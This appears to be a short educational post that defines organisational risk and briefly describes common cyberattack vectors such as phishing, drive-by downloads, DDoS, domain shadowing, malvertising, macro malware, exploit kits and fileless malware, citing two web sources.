Risk could be defined as the effect of uncertainty on objectives. The different types of risks that could arise are
1. Financial risk.
2. Technical risk.
3. Management risk.
4. Security risk.
An attacker would be trying to disrupt the financial-technical-management balance of the organization so as to expose the security vulnerabilities in the organization.
The common attack vectors (Metivier, B) are :
a. Phishing : Using an email disguised as a legitimate message, hackers entice the recipient to open either an infected attachment or click a link that takes them to an infected website. The goal is to lure individuals to give up their sensitive data, such as personally identifiable information, banking and credit card numbers, and passwords.
b. Malware : Malware, short for “malicious software,” is software (or script or code) designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems and mobile devices. Malware is a tool of choice for hackers because it's effective, easy-to-use, and readily available
c. Drive by Download : In this particular type of attack, the malware is inadvertently downloaded from a legitimate site that has been compromised without any action from the user. This could happen when the end-user visits a website, view an email message, or when he/she clicks on a pop-up window (message) which would be deceptive. It typically takes advantage of vulnerabilities in the user’s operating system or other program.
d. Distributed Denial of Service (DDoS) : A DDoS attack means to make a machine (Server or even desktop) or any network resources like the switch, hub, router etc., unavailable for its actual use. It often consumes more computer resources than a device can handle or disrupts by disabling communication services. In this type of attack the targeted machine is flooded with multiple (quite enormous in number) requests, there by overloading the system and preventing the device from receiving legitimate requests that need to be fulfilled on priority. This attack targets to disrupt the security factor - Availability of the CIA triad.
e. Domain Shadowing : First the hacker obtains domain registrar credentials through a successful attack, usually phishing. This allows them to add host records to an organization’s DNS records and redirect them to their malicious IPs.
For example, let's say you've determined that you will never worry about traffic to "somelocalcompany.com," and you whitelist the domain. They fall victim to domain shadowing, and now you may have traffic going to "somemalicioushostinrussia.somelocalcompany.com" and not even notice it. So much for whitelisting by domain! Your systems are headed out to Russia to pick up some nasty code!
f. Malvertising : These are online ads that are owned by cybercriminals. Malicious software is downloaded onto the user’s systems when they click the infected ad, which can be on any site, even popular ones. They are often redirected to an exploit kit landing page. The exploit kit can can successfully load malware into a system without user consent. Often the victim is unaware that anything suspicious happened.
Windows Macros : Macros are codes embedded within another program to automate repetitive tasks. Hiding malicious macros inside Microsoft Office programs, like Word, used to be the prevailing technique for launching attacks. Though Microsoft has since developed security features that greatly reduces the use of macro-based malware, the technique is still in use. Malware is installed when the recipient opens the infected document.
Exploit Kits : An exploit kit is a hacker induced software or program that runs/resides on the web servers. The purpose of this would be to identify the technical vulnerabilities in the system and manipulate the identified soft areas. It’s a tool that hackers use to break in – like picking a lock. Once installed, the kit uploads and executes a variety of malicious code. They are sold in cyber-criminal circles, often with vulnerabilities already loaded onto them, and are extremely easy to use.
Fileless malware : Fileless malware is not really fileless, it just isn’t an executable file (.exe). When you are compromised using this technique, there isn’t a malicious program sitting on your PC. It operates by using legitimate programs, typically PowerShell, for malicious purposes. A malicious encoded script can be decoded by PowerShell, and then reach out to a command and control (C&C) server without writing any files to the local hard drive.
Reference
Metivier, B. (n.d.). Threat Hunting: Common Attack Vectors and Delivery Channels. Retrieved from https://www.sagedatasecurity.com/blog/threat-hunting-common-attack-vectors-and-delivery-channels
Guedez, A. (2018, May 02). Attack vectors in cybersecurity: All you need to know to expel them out from your digital environments. Retrieved from https://www.gb-advisors.com/attack-vectors-in-cybersecurity/
Comments